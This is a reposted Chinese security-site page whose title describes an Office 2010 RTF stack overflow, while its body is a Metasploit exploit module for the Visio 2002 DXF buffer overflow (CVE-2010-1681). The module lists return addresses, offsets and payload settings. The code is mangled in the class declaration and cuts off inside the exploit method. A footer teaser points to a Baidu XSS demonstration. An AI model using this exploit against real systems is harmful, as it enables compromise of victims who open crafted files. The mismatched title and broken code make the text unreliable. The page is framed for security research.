微软 Office 2010 的 RTF 头堆栈溢出漏洞利用

  • A+
所属分类:lcx

SEBUG-ID:20666

SEBUG-Appdir:Office Visio

发布时间:2011-06-26

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

##
# $Id: visio_dxf_bof.rb 13034 2011-06-26 16:09:53Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/##
# CVE,2010-1681
 
require 'msf/core'
 
class Metasploit3  'Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability',
            'Description'    => %q{
                    This module exploits a stack based overflow vulnerability in the handling
                of the DXF files by Microsoft Visio 2002. Revisions prior to the release of
                the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application
                is used to import a specially crafted DXF file, while parsing the HEADER section
                of the DXF file.
 
                To trigger the vulnerability an attacker must convince someone to insert a
                specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'
                },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'CORE Security',  # original discovery
                    'Shahin Ramezany ', # MOAUB #8 exploit and binary analysis
                    'juan vazquez', # metasploit module
                ],
            'Version'        => '$Revision: 13034 $',
            'References'     =>
                [
                    [ 'CVE','2010-1681' ],
                    [ 'OSVDB', '64446' ],
                    [ 'BID', '39836' ],
                    [ 'URL', 'http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow' ],
                    [ 'URL', 'http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'DisablePayloadHandler' => 'true',
                },
            'Payload' =>
                {
                    'Space'         => 2000,
                    'BadChars'      => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
                    'DisableNops'   => true, # no need
                    'EncoderOptions' =>
                        {
                            'BufferRegister' => 'ECX'
                        }
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    # Microsoft Office Visio 2002
                    # VISIO.EXE v10.0.525.4
                    # VISIODWG.DLL v10.0.525.4
                    # ECXAdjust:
                    # 0x8 => ESP points to the prepended shellcode
                    # 0x1A => Padding
                    # 0x2 => len(push esp, pop ecx)
                    # 0x3 => len(sub)
                    # 0x6 => len(add)
                    [
                        'Visio 2002 English on Windows XP SP3 Spanish',
                        {
                            'Ret'         => 0x6173345c, # push esp, ret from VISIODWG.DLL
                            'Offset'      => 0x50,       # EIP
                            'ReadAddress' => 0x617a4748, # points to VISIODWG.DLL data segment
                            'ECXAdjust'   => 0x2D
                        }
                    ],
                    [
                        'Visio 2002 English on Windows XP SP3 English',
                        {
                            'Ret'         => 0x60455F6B, # push esp, ret from VISLIB.DLL
                            'Offset'      => 0x50,       # EIP
                            'ReadAddress' => 0x66852040, # points to VISIODWG.DLL data segment
                            'ECXAdjust'   => 0x2D,
                        }
                    ],
                ],
            'DisclosureDate' => 'May 04 2010'))
 
        register_options(
            [
                OptString.new('FILENAME',   [ true, 'The file name.',  'msf.dxf']),
            ], self.class)
    end
 
    def exploit
        content = "0n"
        content 
    

文章来源于lcx.cc:微软 Office 2010 的 RTF 头堆栈溢出漏洞利用

相关推荐: 手贱乱点 - 居然点到了百度 XSS 漏洞一枚

百度 XSS 跨站漏洞一个,漏洞演示: http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=CustomEvent.checkDashStatus&current=d54b41…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: